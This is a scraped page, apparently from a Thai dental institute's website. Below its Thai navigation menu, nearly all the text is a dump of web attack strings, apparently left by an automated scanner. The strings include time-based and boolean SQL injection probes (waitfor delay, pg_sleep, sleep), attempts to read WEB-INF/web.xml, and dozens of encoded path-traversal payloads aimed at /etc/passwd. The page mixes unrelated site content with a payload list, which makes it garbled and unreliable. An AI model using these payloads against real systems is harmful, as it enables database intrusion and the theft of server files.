> ความเป็นมา
        > บทบาท
        > โครงสร้างสถาบัน
        > ผู้บริหาร
        > บุคลากร
        > ติดต่อ
        > หลักสูตรอบรม
        > แนวปฎิบัติทางทันตกรรม
        > ทันตกรรมเพื่อวิชาชีพ
        > วิทยาการเพื่อประชาชน
        > กิจกรรม
        > การจัดซื้อจัดจ้าง
        > การรับสมัครงาน
 
 
 
  วีดัโอ ทันตกรรม

Mr."; waitfor delay '0:0:4' --


Mr.'; waitfor delay '0:0:4' --


Mr.';select pg_sleep(4); --


Mr. or (sleep(4)+1) limit 1 --


Mr. and sleep(4)


Mr."=sleep(4)="


Mr.'=sleep(4)='


Mr." or (sleep(4)+1) limit 1 --


Mr.' or (sleep(4)+1) limit 1 --


Mr." and sleep(4)="


Mr.' and (sleep(4)+1) limit 1 --


Mr.' and sleep(4)='


-1" or "63"="0


-1" or "63"="63


-1' or '78'='0


-1' or '78'='78


-1 or 87=0


-1 or 87=87


Mr.


Mr.


WEB-INF\web.xml


WEB-INF/web.xml


/\../\../\../\../\../\../\../etc/passwd


file:///etc/passwd


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././


..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


/etc/passwd


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd